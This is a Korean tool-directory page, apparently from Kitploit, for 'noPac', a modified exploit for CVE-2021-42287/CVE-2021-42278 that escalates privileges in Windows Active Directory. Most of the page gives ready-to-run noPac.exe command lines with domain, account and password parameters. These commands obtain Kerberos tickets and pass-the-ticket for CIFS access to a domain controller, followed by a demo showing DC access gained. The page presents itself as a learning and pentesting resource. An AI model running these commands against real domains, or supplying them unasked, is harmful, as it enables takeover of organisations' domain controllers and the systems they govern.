Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
noPac — CVE-2021-42287/CVE-2021-42278 익스플로이터 | Kitploit
도구/GitHubGitHub/trya9ain/nopac
Authentication & AuthorizationPrivilege EscalationVulnerability AnalysisExploitationPenetration Testing
GitHubtrya9ain/nopac

noPac

CVE-2021-42287/CVE-2021-42278 익스플로이터

저장소 보기
1413년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

noPac

이 프로젝트는 noPac의 원리를 학습하기 위해 시작되었으며, cube0x0의 프로젝트를 기반으로 몇 가지 변경을 가했습니다. 소스 코드에 개인적인 이해를 위한 주석을 추가했습니다.

  • Scan 기능을 제거했습니다. 개인적으로 Scan 기능은 쓸모가 없다고 생각합니다.
  • MachineAccountQuota 값을 확인하여 0이면 프로그램을 종료합니다.
  • 컴퓨터 계정 추가 시의 판단 처리를 최적화했습니다.
  • TGT 출력을 추가했습니다.

취약점 분석 글은 제 블로그 게시물에서 확인할 수 있습니다: noPac 분석

이용 조건

noPac은 CVE-2021-42278 (sAMAccountName spoofing) 및 CVE-2021-42287 (deceiving the KDC) 두 취약점을 조합한 공격입니다. 이 두 취약점의 이용 조건을 동시에 충족해야만 성공적으로 이용할 수 있습니다.

사용 방법

root@kitploit:~
Examples: Get TGT and ST

  noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword

  noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei

  noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword /service altservice

  noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs

Examples: PTT

  noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword /service altservice /ptt

  noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

  noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

가장 일반적인 방법은 PTT입니다:

root@kitploit:~
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

데모

noPac을 이용하기 전에는 DC에 접근할 수 없습니다.

noPac 이용.

root@kitploit:~
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

PTT 후 현재 창에서 DC에 다시 접근하면 성공적으로 접근할 수 있습니다.

이용 환경

참고: 이 프로그램은 .NET 4.0+ 환경의 시스템에서만 실행할 수 있습니다. Windows Server 2012는 기본적으로 .NET 4.0을, Windows Server 2008은 기본적으로 .NET 3.5를 포함합니다.

시스템에 설치된 .NET 버전 확인:

root@kitploit:~
dir c:\Windows\Microsoft.NET\Framework64

도구 다운로드